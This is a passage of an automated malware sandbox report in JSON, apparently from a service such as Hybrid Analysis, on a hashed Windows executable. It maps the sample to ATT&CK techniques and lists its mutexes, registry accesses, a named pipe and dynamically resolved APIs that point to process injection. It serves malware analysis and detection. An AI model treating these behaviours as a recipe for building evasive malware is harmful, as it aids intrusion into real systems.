"https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\qhdkbaei.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\RasPbFile\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"\n \"Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"\n \"RasPbFile\"", "origin": "Created Mutant", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" touched \"Network\" (Path: \"HKCU\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\SHELLFOLDER\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" touched \"Recycle Bin\" (Path: \"HKCU\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\SHELLFOLDER\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" touched \"Control Panel\" (Path: \"HKCU\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\SHELLFOLDER\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" touched \"UsersLibraries\" (Path: \"HKCU\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\SHELLFOLDER\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" touched \"CLSID_SearchFolder\" (Path: \"HKCU\\CLSID\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\\SHELLFOLDER\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" touched \"Microsoft OneNote Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\\SHELLFOLDER\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" touched \"IE History and Feeds Shell Data Source for Windows Search\" (Path: \"HKCU\\CLSID\\{11016101-E366-4D22-BC06-4ADA335C892B}\\SHELLFOLDER\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" touched \"@C:\\Program Files (x86)\\Microsoft Office\\Office15\\MAPISHELL.DLL,-110\" (Path: \"HKCU\\CLSID\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\\SHELLFOLDER\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" touched \"Public Folder\" (Path: \"HKCU\\CLSID\\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\\SHELLFOLDER\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" touched \"Control Panel command object for Start menu and desktop\" (Path: \"HKCU\\CLSID\\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\\SHELLFOLDER\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-110\" (Path: \"HKCU\\CLSID\\{89D83576-6BD1-4C86-9454-BEB04E94C819}\\SHELLFOLDER\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" touched \"DXP\" (Path: \"HKCU\\CLSID\\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\\SHELLFOLDER\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" touched \"CLSID_SearchHome\" (Path: \"HKCU\\CLSID\\{9343812E-1C37-4A49-A12E-4B2D810D956B}\\SHELLFOLDER\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" touched \"Windows Search Service Media Center Namespace Extension Handler\" (Path: \"HKCU\\CLSID\\{98D99750-0B8A-4C59-9151-589053683D73}\\SHELLFOLDER\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" touched \"Other Users Folder\" (Path: \"HKCU\\CLSID\\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\\SHELLFOLDER\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-112\" (Path: \"HKCU\\CLSID\\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\\SHELLFOLDER\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" touched \"CLSID_StartMenuProviderFolder\" (Path: \"HKCU\\CLSID\\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\\SHELLFOLDER\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" touched \"CLSID_StartMenuPathCompleteProviderFolder\" (Path: \"HKCU\\CLSID\\{E345F35F-9397-435C-8F95-4E922C26259E}\\SHELLFOLDER\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" touched \"Games Explorer\" (Path: \"HKCU\\CLSID\\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\\SHELLFOLDER\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" touched \"Computers and Devices\" (Path: \"HKCU\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\SHELLFOLDER\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" touched \"Sticky Notes Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\\SHELLFOLDER\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 74F70000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcryptprimitives.dll\" at 74B30000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-138", "type": 6, "relevance": 3, "name": "Calls an API typically used to create an instance of a named pipe", "description": "\"svchost.exe\" called \"NtCreateNamedPipeFile\" with parameter \"pipe\\uqyipjlp\" - (UID: 00000000-00002564)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00005876)\n 